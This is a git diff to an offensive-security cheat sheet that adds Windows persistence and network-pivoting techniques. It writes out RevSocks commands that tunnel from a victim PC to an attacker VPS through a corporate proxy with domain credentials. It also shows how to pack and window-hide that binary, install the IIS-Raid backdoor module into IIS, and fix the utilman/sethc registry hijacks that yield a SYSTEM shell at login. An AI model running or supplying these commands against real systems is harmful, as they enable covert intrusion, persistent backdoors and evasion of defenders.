diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 94d0b59a..2fa5a502 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -13,6 +13,7 @@ * [sshuttle](#sshuttle) * [chisel](#chisel) * [Rpivot](#rpivot) +* [RevSocks](#revsocks) * [plink](#plink) * [ngrok](#ngrok) * [Basic Pivoting Types](#basic-pivoting-types) @@ -192,6 +193,38 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE ``` +## revsocks + +```powershell +# Listen on the server and create a SOCKS 5 proxy on port 1080 +user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234 + +# Connect client to the server +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10" +``` + + +```powershell +# Build for Linux +git clone https://github.com/kost/revsocks +export GOPATH=~/go +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +go build +go build -ldflags="-s -w" && upx --brute revsocks + +# Build for Windows +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" +go build -ldflags -H=windowsgui +upx revsocks +``` + + ## plink ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index f72f90c4..5f0b5ac3 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -9,6 +9,9 @@ * [Registry](#registry) * [Startup](#startup) * [Scheduled Task](#scheduled-task) +* [Serviceland](#serviceland) + * [IIS](#iis) + * [Windows Service](#windows-service) * [Elevated](#elevated) * [HKLM](#hklm) * [Services](#services) @@ -101,7 +104,19 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` -## Windows Service +## Serviceland + +### IIS + +IIS Raid – Backdooring IIS Using Native Modules + +```powershell +$ git clone https://github.com/0x09AL/IIS-Raid +$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS +C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true +``` + +### Windows Service Using SharPersist @@ -148,7 +163,7 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. ```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` #### sethc.exe @@ -156,7 +171,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Hit F5 a bunch of times when you are at the RDP login screen. ```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` @@ -164,4 +179,5 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) -* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) +* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) \ No newline at end of file